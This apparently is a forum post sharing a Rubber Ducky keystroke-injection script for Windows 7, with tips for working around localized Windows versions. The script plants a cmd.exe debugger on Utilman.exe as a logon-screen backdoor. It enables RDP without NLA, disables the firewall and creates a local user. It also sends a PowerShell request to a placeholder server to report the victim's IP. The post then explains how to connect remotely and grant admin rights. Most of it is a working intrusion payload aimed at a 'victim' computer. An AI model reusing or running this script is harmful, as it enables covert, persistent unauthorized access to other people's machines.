Hi there,
just want to share some experience of different locales workaround when using exploits
like utilman https://github.com/h...utilman-exploit and creating local user with administrator rights.
The main problem that current firmware does not support russian language (and many others),
so it is impossible to change file ownership or add newly created user to admins group,
as for example in localized windows version Administrators group name also localized
(_Administratory_) (unfortunately this forum not accept RU chars and I can use russian word here) ,
so commands like these will never works
STRING icacls "%systemroot%\System32\Utilman.exe" /grant _Administratory_:F /T[/CODE] [CODE]STRING net localgroup _Administratory_ Local000 /add[/CODE] Post of [b]PCFreak[/b] is amazing http://forums.hak5.o...ouching-a-file/ and this helped me a lot to make such workaround. As there is very restricted time while injecting victim computer, especially if you wil not have physical access to this PC later, here is using also Terminal Services for getting full access. Idea to add local user with restricted righs + utilman hack 'by PCFreak', and then remotely run cmd.exe using "Ease of Access"-button at the logon screen and promote to Admins. After inject script make HTTP request for specified server using powershell, so you may easy find its IP address in webserver logfile. Sure this will work only for real IP addresses, but not with fake or NAT. Windows 7 example, ANY localization, but default keyboard input locale should be US-English anyway, unfortunately. So before injecting try to check or change this. I do not know workaround here, let's discover together? [CODE] DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER DELAY 1000 LEFT DELAY 200 ENTER DELAY 200 ENTER STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 1 /f ENTER DELAY 200 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 200 STRING netsh firewall set opmode disable ENTER DELAY 200 STRING net user Local000 /add ENTER DELAY 200 STRING net user Local000 * ENTER DELAY 200 STRING password ENTER DELAY 200 STRING password ENTER DELAY 200 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://_server_IP_address/injected_host.html','%TEMP%\~tmp932.txt'); ENTER DELAY 200 STRING exit ENTER [/CODE] This script also enables Terminal Services with old clients compartibility (without NLA) mode and disables Windows Firewall. For connection to remote logon screen from NLA-enabled MSTSC clients like in Windows 7 you also need some client side modification, otherwise username and password will be requested before connection to server and you never will be able to see Logon screen and will not be able to use EoA-button. To resolve this issue you need to save empty RDP file and edit this using any editor like notepad.exe, these params should be changed/added: [CODE] authentication level:i:0 enablecredsspsupport:i:0 [/CODE] After this modification save file and connect to server, you will go directly to Logon screen. Give admin rights to your new user and after this you'll be able to login remotely (and locally, sure) --- BTW, another locale problem that fast keys (underlined chars in menu items) in Start menu or Right-button menu are also localized, for this reason I am not using these like [CODE]MENU STRING a[/CODE] instead of this I am select menu item using cursor keys [CODE] MENU DELAY 1000 DOWN DELAY 200 DOWN DELAY 200 ENTER [/CODE] I hope it will be helpful for someone. PS: this script will also work within Terminal Services session, so you will be able also inject remote PC using local USB port, usually it is connected to session on remote side (only fullscreen mode). Regards from Russia :)